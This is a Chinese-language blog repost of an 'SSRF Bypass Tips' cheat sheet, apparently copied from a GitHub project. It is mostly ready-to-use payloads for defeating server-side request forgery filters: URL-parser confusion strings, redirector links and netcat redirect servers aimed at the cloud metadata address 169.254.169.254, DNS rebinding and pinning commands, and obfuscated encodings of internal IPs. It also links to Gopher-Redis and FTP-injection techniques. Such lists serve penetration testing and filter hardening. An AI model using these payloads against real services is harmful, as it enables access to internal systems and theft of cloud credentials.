SSRF Bypass Tips

  • A+
所属分类:安全文章

SSRF(服务器端请求伪造)测试资源


基于快速URL的绕过:

http://google.com:80+&@127.88.23.245:22/#[email protected]:80/

http://127.88.23.245:22/+&@google.com:80#[email protected]:80/

http://google.com:80+&@google.com:80#[email protected]:22/

http://127.88.23.245:22/[email protected]:80/

http://127.88.23.245:22/#@www.google.com:80/


htaccess - 针对各种情况的重定向测试

状态码:300,301,302,303,305,307,308

文件类型:jpg,json,csv,xml

现场演示:

JPG 301响应没有和有效的响应主体:

https://ssrf.localdomain.pw/img-without-body/301-http-169.254.169.254:80-.i.jpg

https://ssrf.localdomain.pw/img-without-body-md/301-http-.i.jpg

https://ssrf.localdomain.pw/img-with-body/301-http-169.254.169.254:80-.i.jpg

https://ssrf.localdomain.pw/img-with-body-md/301-http-.i.jpg

没有和有效的响应主体的json 301响应:

https://ssrf.localdomain.pw/json-without-body/301-http-169.254.169.254:80-.j.json

https://ssrf.localdomain.pw/json-without-body-md/301-http-.j.json

https://ssrf.localdomain.pw/json-with-body/301-http-169.254.169.254:80-.j.json

https://ssrf.localdomain.pw/json-with-body-md/301-http-.j.json

没有和有效的回应主体的csv 301回应:

https://ssrf.localdomain.pw/csv-without-body/301-http-169.254.169.254:80-.c.csv

https://ssrf.localdomain.pw/csv-without-body-md/301-http-.c.csv

https://ssrf.localdomain.pw/csv-with-body/301-http-169.254.169.254:80-.c.csv

https://ssrf.localdomain.pw/csv-with-body-md/301-http-.c.csv

没有和有效的响应主体的xml 301响应:

https://ssrf.localdomain.pw/xml-without-body/301-http-169.254.169.254:80-.x.xml

https://ssrf.localdomain.pw/xml-without-body-md/301-http-.x.xml

https://ssrf.localdomain.pw/xml-with-body/301-http-169.254.169.254:80-.x.xml

https://ssrf.localdomain.pw/xml-with-body-md/301-http-.x.xml


custom-30x - 使用PHP自定义30x响应和位置标题

现场演示:

https://ssrf.localdomain.pw/custom-30x/?code=332&url=http://169.254.169.254/&content-type=YXBwbGljYXRpb24vanNvbg==&body=eyJhIjpbeyJiIjoiMiIsImMiOiIzIn1dfQ==&fakext=/j.json


custom-200 - 使用PHP自定义200响应和Content-Location标头

现场演示:

https://ssrf.localdomain.pw/custom-200/?url=http://169.254.169.254/&content-type=YXBwbGljYXRpb24vanNvbg==&body=eyJhIjpbeyJiIjoiMiIsImMiOiIzIn1dfQ==&fakext=/j.json


custom-201 - 使用PHP自定义201响应和位置标题

现场演示:

https://ssrf.localdomain.pw/custom-201/?url=http://169.254.169.254/&content-type=YXBwbGljYXRpb24vanNvbg==&body=eyJhIjpbeyJiIjoiMiIsImMiOiIzIn1dfQ==&fakext=/j.json


使用netcat的最小Web服务器

while true ; do nc -l -p 80 -c 'echo -e "HTTP/1.1 302 FoundnContent-Type: application/jsonnLocation: http://169.254.169.254/n{"a":"b"}"'; done

while true ; do nc -l -p 554 -c 'echo -e "RTSP/1.0 301 MovednCSeq: 1nLocation: http://169.254.169.254/"'; done


ip.py - 用于SSRF测试的备用IP编码工具

python ip.py IP PORT WhiteListedDomain EXPORT(可选)

python ip.py 169.254.169.254 80 www.google.com

python ip.py 169.254.169.254 80 www.google.com导出


DNS固定

nslookup ssrf-169.254.169.254.localdomain.pw

nslookup ssrf-cloud.localdomain.pw

http://xip.io/

nslookup 169.254.169.254.xip.io

nslookup 1ynrnhl.xip.io

nslookup www.owasp.org.1ynrnhl.xip.io

nslookup 127.127.127.127.xip.io


DNS固定争用条件

nslookup ssrf-race-169.254.169.254.localdomain.pw


DNS重新绑定

点子安装twised

python dns.py WhitelistedIP InternalIP Port

python dns.py 216.58.214.206 169.254.169.254 53

http://webcache.googleusercontent.com/search?q=cache:http://www.611eternity.com/DNSRebinding%E6%8A%80%E6%9C%AF%E5%AD%A6%E4%B9% A0 /


cloud-metadata.txt - 用于SSRF测试的云元数据字典


svg - 带有svg文件的SSRF


ffmpeg - 带有ffmpeg的SSRF

https://hackerone.com/reports/237381

https://hackerone.com/reports/243470

https://github.com/neex/ffmpeg-avi-m3u-xbin

https://www.blackhat.com/docs/us-16/materials/us-16-Ermishkin-Viral-Video-Exploiting-Ssrf-In-Video-Converters.pdf

https://docs.google.com/presentation/d/1yqWy_aE3dQNXAhW8kxMxRqtP7qMHaIfMzUDpEqFneos/edit#slide=id.g22371f2702_0_15


iframe - 使用html iframe + URL旁路的SSRF

现场演示:

http://ssrf.localdomain.pw/iframe/?proto=http&ip=127.0.0.1&port=80&url=/


滥用封闭的字母数字

http://169。254。169。254/

http://169。254。169。254/

http://⑯⑨。②⑤④。⑯⑨。②⑤④/

http://⓪ⓧⓐ⑨。⓪ⓧⓕⓔ。⓪ⓧⓐ⑨。⓪ⓧⓕⓔ:80/

http://⓪ⓧⓐ⑨ⓕⓔⓐ⑨ⓕⓔ:80/

http://②⑧⑤②⓪③⑨①⑥⑥:80/

http://④②⑤。⑤①⓪。④②⑤。⑤①⓪:80/

http://⓪②⑤①。⓪③⑦⑥。⓪②⑤①。⓪③⑦⑥:80/

http://⓪⓪②⑤①。⓪⓪⓪③⑦⑥。⓪⓪⓪⓪②⑤①。⓪⓪⓪⓪⓪③⑦⑥:80/

http://[::①⑥⑨。②⑤④。⑯⑨。②⑤④]:80/

http://[::ⓕⓕⓕⓕ:①⑥⑨。②⑤④。⑯⑨。②⑤④]:80/

http://⓪ⓧⓐ⑨。⓪③⑦⑥。④③⑤①⑧:80/

http://⓪ⓧⓐ⑨。⑯⑥⑧⑨⑥⑥②:80/

http://⓪⓪②⑤①。⑯⑥⑧⑨⑥⑥②:80/

http://⓪⓪②⑤①。⓪ⓧⓕⓔ。④③⑤①⑧:80/

common-open-ports.txt - 常用端口列表


Java / Python FTP注入允许防火墙绕过

http://webcache.googleusercontent.com/search?q=cache:http://blog.blindspotsecurity.com/2017/02/advisory-javapython-ftp-injections.html

https://github.com/ecbftw/poc/blob/master/java-python-ftp-injection/ftp-injection-server.py

http://webcache.googleusercontent.com/search?q=cache:https://shiftordie.de/blog/2017/02/18/smtp-over-xxe/


SSRF + Gopher + Redis

http://webcache.googleusercontent.com/search?q=cache:http://vinc.top/2016/11/24/%E3%80%90ssrf%E3%80%91ssrfgopher%E6%90%9E%E5 %AE%9A%E5%86%85%E7%BD%91%E6%9C%AA%E6%8E%88%E6%9D%83redis /

https://webcache.googleusercontent.com/search?q=cache:http://antirez.com/news/96


前5个常常容易出现SSRF漏洞的功能:

https://webcache.googleusercontent.com/search?q=cache:https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF


AppSecEU15-Server_side_browsing_considered_harmful.pdf


美国17财-A-NEW-ERA-OF-SSRF-开拓-URL解析器,在向的编程,Languages.pdf


一个小巧可爱的网址模糊器

https://github.com/orangetw/Tiny-URL-Fuzzer


通过滥用Ruby本地解析器中的错误绕过服务器端请求伪造过滤器

https://edoverflow.com/2017/ruby-resolv-bug/

https://hackerone.com/reports/287245

https://hackerone.com/reports/215105

0177.1 => 127.0.0.1

0x7f.1 => 127.0.0.1

127.1 => 127.0.0.1


SSRF提示

http://webcache.googleusercontent.com/search?q=cache:http://blog.safebuff.com/2016/07/03/SSRF-Tips/


PHP的SSRF技术

https://medium.com/secjuice/php-ssrf-techniques-9d422cb28d51


SSRF圣经

https://docs.google.com/document/d/1v1TkWZtrhzRLy0bYXBcdLUedXGb9njTNIJXa3u9akHM


SSRF代理

https://github.com/bcoles/ssrf_proxy

SSRF Proxy有助于通过易受服务器端请求伪造攻击的服务器隧穿HTTP通信

转载于GitHub,项目地址阅读原文!


SSRF Bypass Tips

以上临时工所述
我司一概不负责

本文始发于微信公众号(逢人斗智斗勇):SSRF Bypass Tips

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: